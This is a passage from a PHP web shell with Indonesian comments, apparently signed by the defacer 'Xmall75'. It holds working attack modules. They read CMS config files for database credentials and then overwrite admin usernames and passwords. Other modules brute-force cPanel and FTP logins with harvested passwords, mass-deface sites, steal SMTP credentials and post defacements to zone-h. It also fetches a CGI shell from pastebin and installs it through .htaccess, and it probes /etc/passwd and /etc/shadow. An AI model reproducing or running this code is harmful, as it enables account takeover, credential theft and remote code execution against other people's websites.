1438 $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
1439 } else {
1440 $url_target = "Login => <a href='$target/wp-login.php' target='_blank'><u>$target/wp-login.php</u></a><br>";
1441 }
1442 $update = mysql_query("UPDATE $prefix SET user_login='$user_baru',user_pass='$pass_baru' WHERE id='$id'");
1443 echo "Config => ".$file_conf."<br>";
1444 echo "CMS => Wordpress<br>";
1445 echo $url_target;
1446 if(!$update OR !$conn OR !$db) {
1447 echo "Status => <font color=red>".mysql_error()."</font><br><br>";
1448 } else {
1449 echo "Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
1450 }
1451 mysql_close($conn);
1452 } elseif(preg_match("/Magento|Mage_Core/",$config)) {
1453 $dbhost = ambilkata($config,"<host><![CDATA[","]]></host>");
1454 $dbuser = ambilkata($config,"<username><![CDATA[","]]></username>");
1455 $dbpass = ambilkata($config,"<password><![CDATA[","]]></password>");
1456 $dbname = ambilkata($config,"<dbname><![CDATA[","]]></dbname>");
1457 $dbprefix = ambilkata($config,"<table_prefix><![CDATA[","]]></table_prefix>");
1458 $prefix = $dbprefix."admin_user";
1459 $option = $dbprefix."core_config_data";
1460 $conn = mysql_connect($dbhost,$dbuser,$dbpass);
1461 $db = mysql_select_db($dbname);
1462 $q = mysql_query("SELECT * FROM $prefix ORDER BY user_id ASC");
1463 $result = mysql_fetch_array($q);
1464 $id = $result[user_id];
1465 $q2 = mysql_query("SELECT * FROM $option WHERE path='web/secure/base_url'");
1466 $result2 = mysql_fetch_array($q2);
1467 $target = $result2[value];
1468 if($target == '') {
1469 $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
1470 } else {
1471 $url_target = "Login => <a href='$target/admin/' target='_blank'><u>$target/admin/</u></a><br>";
1472 }
1473 $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE user_id='$id'");
1474 echo "Config => ".$file_conf."<br>";
1475 echo "CMS => Magento<br>";
1476 echo $url_target;
1477 if(!$update OR !$conn OR !$db) {
1478 echo "Status => <font color=red>".mysql_error()."</font><br><br>";
1479 } else {
1480 echo "Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
1481 }
1482 mysql_close($conn);
1483 } elseif(preg_match("/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/",$config)) {
1484 $dbhost = ambilkata($config,"'DB_HOSTNAME', '","'");
1485 $dbuser = ambilkata($config,"'DB_USERNAME', '","'");
1486 $dbpass = ambilkata($config,"'DB_PASSWORD', '","'");
1487 $dbname = ambilkata($config,"'DB_DATABASE', '","'");
1488 $dbprefix = ambilkata($config,"'DB_PREFIX', '","'");
1489 $prefix = $dbprefix."user";
1490 $conn = mysql_connect($dbhost,$dbuser,$dbpass);
1491 $db = mysql_select_db($dbname);
1492 $q = mysql_query("SELECT * FROM $prefix ORDER BY user_id ASC");
1493 $result = mysql_fetch_array($q);
1494 $id = $result[user_id];
1495 $target = ambilkata($config,"HTTP_SERVER', '","'");
1496 if($target == '') {
1497 $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
1498 } else {
1499 $url_target = "Login => <a href='$target' target='_blank'><u>$target</u></a><br>";
1500 }
1501 $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE user_id='$id'");
1502 echo "Config => ".$file_conf."<br>";
1503 echo "CMS => OpenCart<br>";
1504 echo $url_target;
1505 if(!$update OR !$conn OR !$db) {
1506 echo "Status => <font color=red>".mysql_error()."</font><br><br>";
1507 } else {
1508 echo "Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
1509 }
1510 mysql_close($conn);
1511 } elseif(preg_match("/panggil fungsi validasi xss dan injection/",$config)) {
1512 $dbhost = ambilkata($config,'server = "','"');
1513 $dbuser = ambilkata($config,'username = "','"');
1514 $dbpass = ambilkata($config,'password = "','"');
1515 $dbname = ambilkata($config,'database = "','"');
1516 $prefix = "users";
1517 $option = "identitas";
1518 $conn = mysql_connect($dbhost,$dbuser,$dbpass);
1519 $db = mysql_select_db($dbname);
1520 $q = mysql_query("SELECT * FROM $option ORDER BY id_identitas ASC");
1521 $result = mysql_fetch_array($q);
1522 $target = $result[alamat_website];
1523 if($target == '') {
1524 $target2 = $result[url];
1525 $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
1526 if($target2 == '') {
1527 $url_target2 = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
1528 } else {
1529 $cek_login3 = file_get_contents("$target2/adminweb/");
1530 $cek_login4 = file_get_contents("$target2/lokomedia/adminweb/");
1531 if(preg_match("/CMS Lokomedia|Administrator/", $cek_login3)) {
1532 $url_target2 = "Login => <a href='$target2/adminweb' target='_blank'><u>$target2/adminweb</u></a><br>";
1533 } elseif(preg_match("/CMS Lokomedia|Lokomedia/", $cek_login4)) {
1534 $url_target2 = "Login => <a href='$target2/lokomedia/adminweb' target='_blank'><u>$target2/lokomedia/adminweb</u></a><br>";
1535 } else {
1536 $url_target2 = "Login => <a href='$target2' target='_blank'><u>$target2</u></a> [ <font color=red>gatau admin login nya dimana :p</font> ]<br>";
1537 }
1538 }
1539 } else {
1540 $cek_login = file_get_contents("$target/adminweb/");
1541 $cek_login2 = file_get_contents("$target/lokomedia/adminweb/");
1542 if(preg_match("/CMS Lokomedia|Administrator/", $cek_login)) {
1543 $url_target = "Login => <a href='$target/adminweb' target='_blank'><u>$target/adminweb</u></a><br>";
1544 } elseif(preg_match("/CMS Lokomedia|Lokomedia/", $cek_login2)) {
1545 $url_target = "Login => <a href='$target/lokomedia/adminweb' target='_blank'><u>$target/lokomedia/adminweb</u></a><br>";
1546 } else {
1547 $url_target = "Login => <a href='$target' target='_blank'><u>$target</u></a> [ <font color=red>gatau admin login nya dimana :p</font> ]<br>";
1548 }
1549 }
1550 $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE level='admin'");
1551 echo "Config => ".$file_conf."<br>";
1552 echo "CMS => Lokomedia<br>";
1553 if(preg_match('/error, gabisa ambil nama domain nya/', $url_target)) {
1554 echo $url_target2;
1555 } else {
1556 echo $url_target;
1557 }
1558 if(!$update OR !$conn OR !$db) {
1559 echo "Status => <font color=red>".mysql_error()."</font><br><br>";
1560 } else {
1561 echo "Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
1562 }
1563 mysql_close($conn);
1564 }
1565 }
1566 }
1567 } else {
1568 echo "<center>
1569 <h1>Auto Edit User Config</h1>
1570 <form method='post'>
1571 DIR Config: <br>
1572 <input type='text' size='50' name='config_dir' value='$dir'><br><br>
1573 Set User & Pass: <br>
1574 <input type='text' name='user_baru' value='Xmall75' placeholder='user_baru'><br>
1575 <input type='text' name='pass_baru' value='Xmall75' placeholder='pass_baru'><br>
1576 <input type='submit' name='hajar' value='Hajar!' style='width: 215px;'>
1577 </form>
1578 <span>NB: Tools ini work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span><br>
1579 ";
1580 }
1581} elseif($_GET['do'] == 'cpanel') {
1582 if($_POST['crack']) {
1583 $usercp = explode("\r\n", $_POST['user_cp']);
1584 $passcp = explode("\r\n", $_POST['pass_cp']);
1585 $i = 0;
1586 foreach($usercp as $ucp) {
1587 foreach($passcp as $pcp) {
1588 if(@mysql_connect('localhost', $ucp, $pcp)) {
1589 if($_SESSION[$ucp] && $_SESSION[$pcp]) {
1590 } else {
1591 $_SESSION[$ucp] = "1";
1592 $_SESSION[$pcp] = "1";
1593 if($ucp == '' || $pcp == '') {
1594
1595 } else {
1596 $i++;
1597 if(function_exists('posix_getpwuid')) {
1598 $domain_cp = file_get_contents("/etc/named.conf");
1599 if($domain_cp == '') {
1600 $dom = "<font color=red>gabisa ambil nama domain nya</font>";
1601 } else {
1602 preg_match_all("#/var/named/(.*?).db#", $domain_cp, $domains_cp);
1603 foreach($domains_cp[1] as $dj) {
1604 $user_cp_url = posix_getpwuid(@fileowner("/etc/valiases/$dj"));
1605 $user_cp_url = $user_cp_url['name'];
1606 if($user_cp_url == $ucp) {
1607 $dom = "<a href='http://$dj/' target='_blank'><font color=lime>$dj</font></a>";
1608 break;
1609 }
1610 }
1611 }
1612 } else {
1613 $dom = "<font color=red>function is Disable by system</font>";
1614 }
1615 echo "username (<font color=lime>$ucp</font>) password (<font color=lime>$pcp</font>) domain ($dom)<br>";
1616 }
1617 }
1618 }
1619 }
1620 }
1621 if($i == 0) {
1622 } else {
1623 echo "<br>sukses nyolong ".$i." Cpanel";
1624 }
1625 } else {
1626 echo "<center>
1627 <form method='post'>
1628 USER: <br>
1629 <textarea style='width: 450px; height: 150px;' name='user_cp'>";
1630 $_usercp = fopen("/etc/passwd","r");
1631 while($getu = fgets($_usercp)) {
1632 if($getu == '' || !$_usercp) {
1633 echo "<font color=red>Can't read /etc/passwd</font>";
1634 } else {
1635 preg_match_all("/(.*?):x:/", $getu, $u);
1636 foreach($u[1] as $user_cp) {
1637 if(is_dir("/home/$user_cp/public_html")) {
1638 echo "$user_cp\n";
1639 }
1640 }
1641 }
1642 }
1643 echo "</textarea><br>
1644 PASS: <br>
1645 <textarea style='width: 450px; height: 200px;' name='pass_cp'>";
1646 function cp_pass($dir) {
1647 $pass = "";
1648 $dira = scandir($dir);
1649 foreach($dira as $dirb) {
1650 if(!is_file("$dir/$dirb")) continue;
1651 $ambil = file_get_contents("$dir/$dirb");
1652 if(preg_match("/WordPress/", $ambil)) {
1653 $pass .= ambilkata($ambil,"DB_PASSWORD', '","'")."\n";
1654 } elseif(preg_match("/JConfig|joomla/", $ambil)) {
1655 $pass .= ambilkata($ambil,"password = '","'")."\n";
1656 } elseif(preg_match("/Magento|Mage_Core/", $ambil)) {
1657 $pass .= ambilkata($ambil,"<password><![CDATA[","]]></password>")."\n";
1658 } elseif(preg_match("/panggil fungsi validasi xss dan injection/", $ambil)) {
1659 $pass .= ambilkata($ambil,'password = "','"')."\n";
1660 } elseif(preg_match("/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/", $ambil)) {
1661 $pass .= ambilkata($ambil,"'DB_PASSWORD', '","'")."\n";
1662 } elseif(preg_match("/^[client]$/", $ambil)) {
1663 preg_match("/password=(.*?)/", $ambil, $pass1);
1664 if(preg_match('/"/', $pass1[1])) {
1665 $pass1[1] = str_replace('"', "", $pass1[1]);
1666 $pass .= $pass1[1]."\n";
1667 } else {
1668 $pass .= $pass1[1]."\n";
1669 }
1670 } elseif(preg_match("/cc_encryption_hash/", $ambil)) {
1671 $pass .= ambilkata($ambil,"db_password = '","'")."\n";
1672 }
1673 }
1674 echo $pass;
1675 }
1676 $cp_pass = cp_pass($dir);
1677 echo $cp_pass;
1678 echo "</textarea><br>
1679 <input type='submit' name='crack' style='width: 450px;' value='Crack'>
1680 </form>
1681 <span>NB: CPanel Crack ini sudah auto get password ( pake db password ) maka akan work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span><br></center>";
1682 }
1683
1684} elseif($_GET['do'] == 'domain'){
1685 echo "<center><div><p align='center'>Domains and Users</p>";$d0mains = @file("/etc/named.conf");if(!$d0mains){die("<center>Error : can't read [ /etc/named.conf ]</center>");}echo '<table><tr bgcolor=#333><td>Domains</td><td>users</td></tr>';foreach($d0mains as $d0main){if(eregi("zone",$d0main)){preg_match_all('#zone "(.*)"#', $d0main, $domains);flush();if(strlen(trim($domains[1][0])) > 2){$user = posix_getpwuid(@fileowner("/etc/valiases/".$domains[1][0]));echo "<tr><td><a href=http://www.".$domains[1][0]."/>".$domains[1][0]."</a></td><td>".$user['name']."</td></tr>";flush();}}}echo'</div></center>';
1686
1687} elseif($_GET['do'] == 'server'){
1688
1689 echo "<br><center><b>-=Server Security Informations=-</b><center><br>";
1690echo "<center><div class='tmpe'>
1691<table align='center' width='50%'><td><font color='#007700'>Kernel Version</font></td><td>";echo php_uname();
1692echo "<tr><td><font color='#007700'>Web Server</font></td><td>";echo $_SERVER["SERVER_SOFTWARE"];
1693echo "<tr><td><font color='#007700'>PHP Version</font></td><td>";echo phpversion(); echo " on "; echo php_sapi_name();
1694echo "<tr><td><font color='#007700'>Current User</font></td><td>";echo get_current_user();
1695echo "<tr><td><font color='#007700'>User ID</font></td><td>";echo getmyuid();
1696echo "<tr><td><font color='#007700'>Group</font></td><td>";echo getmygid();
1697echo "<tr><td><font color='#007700'>Cwd </font></td><td>";echo getcwd();
1698echo "<tr><td><font color='#007700'>Admin Server</font></td><td>";echo $_SERVER['SERVER_ADMIN'];
1699echo "<tr><td><font color='#007700'>Server Port</font></td><td>";echo $_SERVER['SERVER_PORT'];
1700echo "<tr><td><font color='#007700'>Server IP</font></td><td>";echo $serverIP = gethostbyname($_SERVER["HTTP_HOST"]);
1701echo "<tr><td><font color='#007700'>Client IP</font></td><td>";echo $_SERVER['REMOTE_ADDR'];
1702echo "<tr><td><font color='#007700'>cURL support</font></td><td>";echo function_exists('curl_version')?'Enabled':'No';
1703echo "<tr><td><font color='#007700'>Readable /etc/passwd</font></td><td>";echo @is_readable('/etc/passwd')?"Readable <a href='?action=moco'> [View]</a>":"Not Readable";
1704echo "<tr><td><font color='#007700'>Readable /etc/shadow</font></td><td>";echo @is_readable('/etc/shadow')?"Readable":"Not Readable";
1705$base = (ini_get("open_basedir") or strtoupper(ini_get("open_basedir"))=="ON")?"ON <font color='#007700'>secure</font>":"OFF <font color='#007700'>not secure</font>";
1706echo "<tr><td><font color='#007700'>Open Base Dir</font></td><td><font class=txt>" . $base . "</font>";
1707echo "</table></div></center><br>";
1708
1709} elseif($_GET['do'] == 'hashid') {
1710if (isset($_POST['gethash'])) {
1711 $hash = $_POST['hash'];
1712 if (strlen($hash) == 32) {
1713 $hashresult = "MD5 / MD2 / MD4 Hash";
1714 } elseif (strlen($hash) == 40) {
1715 $hashresult = "SHA-1 Hash / MySQL5 Hash";
1716 } elseif (strlen($hash) == 13) {
1717 $hashresult = "DES(Unix) Hash";
1718 } elseif (strlen($hash) == 16) {
1719 $hashresult = "MySQL Hash / DES(Oracle Hash)";
1720 } elseif (strlen($hash) == 41) {
1721 $GetHashChar = substr($hash, 40);
1722 if ($GetHashChar == "*") {
1723 $hashresult = "MySQL5 Hash";
1724 }
1725 } elseif (strlen($hash) == 64) {
1726 $hashresult = "SHA-256 Hash";
1727 } elseif (strlen($hash) == 96) {
1728 $hashresult = "SHA-384 Hash";
1729 } elseif (strlen($hash) == 128) {
1730 $hashresult = "SHA-512 Hash";
1731 } elseif (strlen($hash) == 34) {
1732 if (strstr($hash, '$1$')) {
1733 $hashresult = "MD5(Unix) Hash";
1734 }
1735 } elseif (strlen($hash) == 37) {
1736 if (strstr($hash, '$apr1$')) {
1737 $hashresult = "MD5(APR) Hash";
1738 }
1739 } elseif (strlen($hash) == 34) {
1740 if (strstr($hash, '$H$')) {
1741 $hashresult = "MD5(phpBB3) Hash";
1742 }
1743 } elseif (strlen($hash) == 34) {
1744 if (strstr($hash, '$P$')) {
1745 $hashresult = "MD5(Wordpress) Hash";
1746 }
1747 } elseif (strlen($hash) == 39) {
1748 if (strstr($hash, '$5$')) {
1749 $hashresult = "SHA-256(Unix) Hash";
1750 }
1751 } elseif (strlen($hash) == 39) {
1752 if (strstr($hash, '$6$')) {
1753 $hashresult = "SHA-512(Unix) Hash";
1754 }
1755 } elseif (strlen($hash) == 24) {
1756 if (strstr($hash, '==')) {
1757 $hashresult = "MD5(Base-64) Hash";
1758 }
1759 } else {
1760 $hashresult = "Hash type not found";
1761 }
1762 } else {
1763 $hashresult = "Not Hash Entered";
1764 }
1765
1766?>
1767
1768<center><br><br><br>
1769
1770 <form action='' method='POST'>
1771 <tr>
1772 <table>
1773 <th colspan='5'>Hash Identifier</th>
1774 <tr><B><td>Enter Hash</td></b><td>:</td> <td><input type='text' name='hash' size='60' /></td><td><input type='submit' name='gethash' value='>>' style='color: #eee;' /></td></tr>
1775 <tr><b><td>Result</td><td>:</td><td><font color='red'><?php echo $hashresult; ?></font></td></tr></b>
1776 </table></tr></form>
1777 </center>
1778
1779<?php
1780
1781} elseif($_GET['do'] == 'cpftp_auto') {
1782 if($_POST['crack']) {
1783 $usercp = explode("\r\n", $_POST['user_cp']);
1784 $passcp = explode("\r\n", $_POST['pass_cp']);
1785 $i = 0;
1786 foreach($usercp as $ucp) {
1787 foreach($passcp as $pcp) {
1788 if(@mysql_connect('localhost', $ucp, $pcp)) {
1789 if($_SESSION[$ucp] && $_SESSION[$pcp]) {
1790 } else {
1791 $_SESSION[$ucp] = "1";
1792 $_SESSION[$pcp] = "1";
1793 if($ucp == '' || $pcp == '') {
1794 //
1795 } else {
1796 echo "[+] username (<font color=lime>$ucp</font>) password (<font color=lime>$pcp</font>)<br>";
1797 $ftp_conn = ftp_connect($ip);
1798 $ftp_login = ftp_login($ftp_conn, $ucp, $pcp);
1799 if((!$ftp_login) || (!$ftp_conn)) {
1800 echo "[+] <font color=red>Login Gagal</font><br><br>";
1801 } else {
1802 echo "[+] <font color=lime>Login Sukses</font><br>";
1803 $fi = htmlspecialchars($_POST['file_deface']);
1804 $deface = ftp_put($ftp_conn, "public_html/$fi", $_POST['deface'], FTP_BINARY);
1805 if($deface) {
1806 $i++;
1807 echo "[+] <font color=lime>Deface Sukses</font><br>";
1808 if(function_exists('posix_getpwuid')) {
1809 $domain_cp = file_get_contents("/etc/named.conf");
1810 if($domain_cp == '') {
1811 echo "[+] <font color=red>gabisa ambil nama domain nya</font><br><br>";
1812 } else {
1813 preg_match_all("#/var/named/(.*?).db#", $domain_cp, $domains_cp);
1814 foreach($domains_cp[1] as $dj) {
1815 $user_cp_url = posix_getpwuid(@fileowner("/etc/valiases/$dj"));
1816 $user_cp_url = $user_cp_url['name'];
1817 if($user_cp_url == $ucp) {
1818 echo "[+] <a href='http://$dj/$fi' target='_blank'>http://$dj/$fi</a><br><br>";
1819 break;
1820 }
1821 }
1822 }
1823 } else {
1824 echo "[+] <font color=red>gabisa ambil nama domain nya</font><br><br>";
1825 }
1826 } else {
1827 echo "[-] <font color=red>Deface Gagal</font><br><br>";
1828 }
1829 }
1830 //echo "username (<font color=lime>$ucp</font>) password (<font color=lime>$pcp</font>)<br>";
1831 }
1832 }
1833 }
1834 }
1835 }
1836 if($i == 0) {
1837 } else {
1838 echo "<br>sukses deface ".$i." Cpanel";
1839 }
1840 } else {
1841 echo "<center>
1842 <form method='post'>
1843 Filename: <br>
1844 <input type='text' name='file_deface' placeholder='index.php' value='index.php' style='width: 450px;'><br>
1845 Deface Page: <br>
1846 <input type='text' name='deface' placeholder='http://www.web-yang-udah-di-deface.com/filemu.php' style='width: 450px;'><br>
1847 USER: <br>
1848 <textarea style='width: 450px; height: 150px;' name='user_cp'>";
1849 $_usercp = fopen("/etc/passwd","r");
1850 while($getu = fgets($_usercp)) {
1851 if($getu == '' || !$_usercp) {
1852 echo "<font color=red>Can't read /etc/passwd</font>";
1853 } else {
1854 preg_match_all("/(.*?):x:/", $getu, $u);
1855 foreach($u[1] as $user_cp) {
1856 if(is_dir("/home/$user_cp/public_html")) {
1857 echo "$user_cp\n";
1858 }
1859 }
1860 }
1861 }
1862 echo "</textarea><br>
1863 PASS: <br>
1864 <textarea style='width: 450px; height: 200px;' name='pass_cp'>";
1865 function cp_pass($dir) {
1866 $pass = "";
1867 $dira = scandir($dir);
1868 foreach($dira as $dirb) {
1869 if(!is_file("$dir/$dirb")) continue;
1870 $ambil = file_get_contents("$dir/$dirb");
1871 if(preg_match("/WordPress/", $ambil)) {
1872 $pass .= ambilkata($ambil,"DB_PASSWORD', '","'")."\n";
1873 } elseif(preg_match("/JConfig|joomla/", $ambil)) {
1874 $pass .= ambilkata($ambil,"password = '","'")."\n";
1875 } elseif(preg_match("/Magento|Mage_Core/", $ambil)) {
1876 $pass .= ambilkata($ambil,"<password><![CDATA[","]]></password>")."\n";
1877 } elseif(preg_match("/panggil fungsi validasi xss dan injection/", $ambil)) {
1878 $pass .= ambilkata($ambil,'password = "','"')."\n";
1879 } elseif(preg_match("/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/", $ambil)) {
1880 $pass .= ambilkata($ambil,"'DB_PASSWORD', '","'")."\n";
1881 } elseif(preg_match("/client/", $ambil)) {
1882 preg_match("/password=(.*)/", $ambil, $pass1);
1883 if(preg_match('/"/', $pass1[1])) {
1884 $pass1[1] = str_replace('"', "", $pass1[1]);
1885 $pass .= $pass1[1]."\n";
1886 }
1887 } elseif(preg_match("/cc_encryption_hash/", $ambil)) {
1888 $pass .= ambilkata($ambil,"db_password = '","'")."\n";
1889 }
1890 }
1891 echo $pass;
1892 }
1893 $cp_pass = cp_pass($dir);
1894 echo $cp_pass;
1895 echo "</textarea><br>
1896 <input type='submit' name='crack' style='width: 450px;' value='Hajar'>
1897 </form>
1898 <span>NB: CPanel Crack ini sudah auto get password ( pake db password ) maka akan work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span><br></center>";
1899 }
1900} elseif($_GET['do'] == 'smtp') {
1901 echo "<center><span>NB: Tools ini work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span></center><br>";
1902 function scj($dir) {
1903 $dira = scandir($dir);
1904 foreach($dira as $dirb) {
1905 if(!is_file("$dir/$dirb")) continue;
1906 $ambil = file_get_contents("$dir/$dirb");
1907 $ambil = str_replace("$", "", $ambil);
1908 if(preg_match("/JConfig|joomla/", $ambil)) {
1909 $smtp_host = ambilkata($ambil,"smtphost = '","'");
1910 $smtp_auth = ambilkata($ambil,"smtpauth = '","'");
1911 $smtp_user = ambilkata($ambil,"smtpuser = '","'");
1912 $smtp_pass = ambilkata($ambil,"smtppass = '","'");
1913 $smtp_port = ambilkata($ambil,"smtpport = '","'");
1914 $smtp_secure = ambilkata($ambil,"smtpsecure = '","'");
1915 echo "SMTP Host: <font color=lime>$smtp_host</font><br>";
1916 echo "SMTP port: <font color=lime>$smtp_port</font><br>";
1917 echo "SMTP user: <font color=lime>$smtp_user</font><br>";
1918 echo "SMTP pass: <font color=lime>$smtp_pass</font><br>";
1919 echo "SMTP auth: <font color=lime>$smtp_auth</font><br>";
1920 echo "SMTP secure: <font color=lime>$smtp_secure</font><br><br>";
1921 }
1922 }
1923 }
1924 $smpt_hunter = scj($dir);
1925 echo $smpt_hunter;
1926} elseif($_GET['do'] == 'auto_wp') {
1927 if($_POST['hajar']) {
1928 $title = htmlspecialchars($_POST['new_title']);
1929 $pn_title = str_replace(" ", "-", $title);
1930 if($_POST['cek_edit'] == "Y") {
1931 $script = $_POST['edit_content'];
1932 } else {
1933 $script = $title;
1934 }
1935 $conf = $_POST['config_dir'];
1936 $scan_conf = scandir($conf);
1937 foreach($scan_conf as $file_conf) {
1938 if(!is_file("$conf/$file_conf")) continue;
1939 $config = file_get_contents("$conf/$file_conf");
1940 if(preg_match("/WordPress/", $config)) {
1941 $dbhost = ambilkata($config,"DB_HOST', '","'");
1942 $dbuser = ambilkata($config,"DB_USER', '","'");
1943 $dbpass = ambilkata($config,"DB_PASSWORD', '","'");
1944 $dbname = ambilkata($config,"DB_NAME', '","'");
1945 $dbprefix = ambilkata($config,"table_prefix = '","'");
1946 $prefix = $dbprefix."posts";
1947 $option = $dbprefix."options";
1948 $conn = mysql_connect($dbhost,$dbuser,$dbpass);
1949 $db = mysql_select_db($dbname);
1950 $q = mysql_query("SELECT * FROM $prefix ORDER BY ID ASC");
1951 $result = mysql_fetch_array($q);
1952 $id = $result[ID];
1953 $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
1954 $result2 = mysql_fetch_array($q2);
1955 $target = $result2[option_value];
1956 $update = mysql_query("UPDATE $prefix SET post_title='$title',post_content='$script',post_name='$pn_title',post_status='publish',comment_status='open',ping_status='open',post_type='post',comment_count='1' WHERE id='$id'");
1957 $update .= mysql_query("UPDATE $option SET option_value='$title' WHERE option_name='blogname' OR option_name='blogdescription'");
1958 echo "<div style='margin: 5px auto;'>";
1959 if($target == '') {
1960 echo "URL: <font color=red>error, gabisa ambil nama domain nya</font> -> ";
1961 } else {
1962 echo "URL: <a href='$target/?p=$id' target='_blank'>$target/?p=$id</a> -> ";
1963 }
1964 if(!$update OR !$conn OR !$db) {
1965 echo "<font color=red>MySQL Error: ".mysql_error()."</font><br>";
1966 } else {
1967 echo "<font color=lime>sukses di ganti.</font><br>";
1968 }
1969 echo "</div>";
1970 mysql_close($conn);
1971 }
1972 }
1973 } else {
1974 echo "<center>
1975 <h1>Auto Edit Title+Content WordPress</h1>
1976 <form method='post'>
1977 DIR Config: <br>
1978 <input type='text' size='50' name='config_dir' value='$dir'><br><br>
1979 Set Title: <br>
1980 <input type='text' name='new_title' value='Hacked by Xmall75 - Security Cyber Art' placeholder='New Title'><br><br>
1981 Edit Content?: <input type='radio' name='cek_edit' value='Y' checked>Y<input type='radio' name='cek_edit' value='N'>N<br>
1982 <span>Jika pilih <u>Y</u> masukin script defacemu ( saran yang simple aja ), kalo pilih <u>N</u> gausah di isi.</span><br>
1983 <textarea name='edit_content' placeholder='contoh script: http://pastebin.com/EpP671gK' style='width: 450px; height: 150px;'></textarea><br>
1984 <input type='submit' name='hajar' value='Hajar!' style='width: 450px;'><br>
1985 </form>
1986 <span>NB: Tools ini work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span><br>
1987 ";
1988 }
1989} elseif($_GET['do'] == 'zoneh') {
1990 if($_POST['submit']) {
1991 $domain = explode("\r\n", $_POST['url']);
1992 $nick = $_POST['nick'];
1993 echo "Defacer Onhold: <a href='http://www.zone-h.org/archive/notifier=$nick/published=0' target='_blank'>http://www.zone-h.org/archive/notifier=$nick/published=0</a><br>";
1994 echo "Defacer Archive: <a href='http://www.zone-h.org/archive/notifier=$nick' target='_blank'>http://www.zone-h.org/archive/notifier=$nick</a><br><br>";
1995 function zoneh($url,$nick) {
1996 $ch = curl_init("http://www.zone-h.com/notify/single");
1997 curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
1998 curl_setopt($ch, CURLOPT_POST, true);
1999 curl_setopt($ch, CURLOPT_POSTFIELDS, "defacer=$nick&domain1=$url&hackmode=1&reason=1&submit=Send");
2000 return curl_exec($ch);
2001 curl_close($ch);
2002 }
2003 foreach($domain as $url) {
2004 $zoneh = zoneh($url,$nick);
2005 if(preg_match("/color=\"red\">OK<\/font><\/li>/i", $zoneh)) {
2006 echo "$url -> <font color=lime>OK</font><br>";
2007 } else {
2008 echo "$url -> <font color=red>ERROR</font><br>";
2009 }
2010 }
2011 } else {
2012 echo "<center><form method='post'>
2013 <u>Defacer</u>: <br>
2014 <input type='text' name='nick' size='50' value='Xmall75'><br>
2015 <u>Domains</u>: <br>
2016 <textarea style='width: 450px; height: 150px;' name='url'></textarea><br>
2017 <input type='submit' name='submit' value='Submit' style='width: 450px;'>
2018 </form>";
2019 }
2020 echo "</center>";
2021
2022} elseif($_GET['do'] == 'cgi') {
2023 $cgi_dir = mkdir('idx_cgi', 0755);
2024 $file_cgi = "idx_cgi/cgi.izo";
2025 $isi_htcgi = "AddHandler cgi-script .izo";
2026 $htcgi = fopen(".htaccess", "w");
2027 fwrite($htcgi, $isi_htcgi);
2028 fclose($htcgi);
2029 $cgi_script = getsource("http://pastebin.com/raw/Lj46KxFT");
2030 $cgi = fopen($file_cgi, "w");
2031 fwrite($cgi, $cgi_script);
2032 fclose($cgi);
2033 chmod($file_cgi, 0755);
2034 echo "<iframe src='idx_cgi/cgi.izo' width='100%' height='100%' frameborder='0' scrolling='no'></iframe>";
2035} elseif($_GET['do'] == 'fake_root') {
2036 ob_start();
2037 $cwd = getcwd();
2038 $ambil_user = explode("/", $cwd);
2039 $user = $ambil_user[2];
2040 if($_POST['reverse']) {
2041 $site = explode("\r\n", $_POST['url']);
2042 $file = $_POST['file'];
2043 foreach($site as $url) {
2044 $cek = getsource("$url/~$user/$file");
2045 if(preg_match("/hacked/i", $cek)) {
2046 echo "URL: <a href='$url/~$user/$file' target='_blank'>$url/~$user/$file</a> -> <font color=lime>Fake Root!</font><br>";
2047 }
2048 }
2049 } else {
2050 echo "<center><form method='post'>
2051 Filename: <br><input type='text' name='file' value='deface.html' size='50' height='10'><br>
2052 User: <br><input type='text' value='$user' size='50' height='10' readonly><br>
2053 Domain: <br>
2054 <textarea style='width: 450px; height: 250px;' name='url'>";
2055 reverse($_SERVER['HTTP_HOST']);
2056 echo "</textarea><br>
2057 <input type='submit' name='reverse' value='Scan Fake Root!' style='width: 450px;'>
2058 </form><br>
2059 NB: Sebelum gunain Tools ini , upload dulu file deface kalian di dir /home/user/ dan /home/user/public_html.</center>";
2060 }
2061
2062} elseif($_GET['do'] == 'hasher') {
2063
2064 $submit = $_POST['go'];
2065 if (isset($submit)) {
2066
2067 $pass = $_POST['password']; // password
2068 $salt = '}#f4ga~g%7hjg4&j(7mk?/!bj30ab-wi=6^7-$^R9F|GK5J#E6WT;IO[JN'; // random string
2069 $hash = md5($pass); // md5 hash
2070 $md2 = hash("md2",$pass); // md2 hash
2071 $md4 = hash("md4", $pass); // md4
2072 $md5_md4_md2 = md5($md4.$md2.$pass); // md5 - md4 - md2
2073 $hash_md5 = md5($salt . $pass); // md5 hash with salt
2074 $hash_md5_double = md5(sha1($salt . $pass)); // md5 hash with salt & sha1
2075 $hash1 = sha1($pass); // sha1 hash
2076 $sha256 = hash('sha256', $pass); // sha256
2077 $sha384 = hash('sha384', $pass); // sha384
2078 $sha512 = hash('sha512', $pass); // sha512
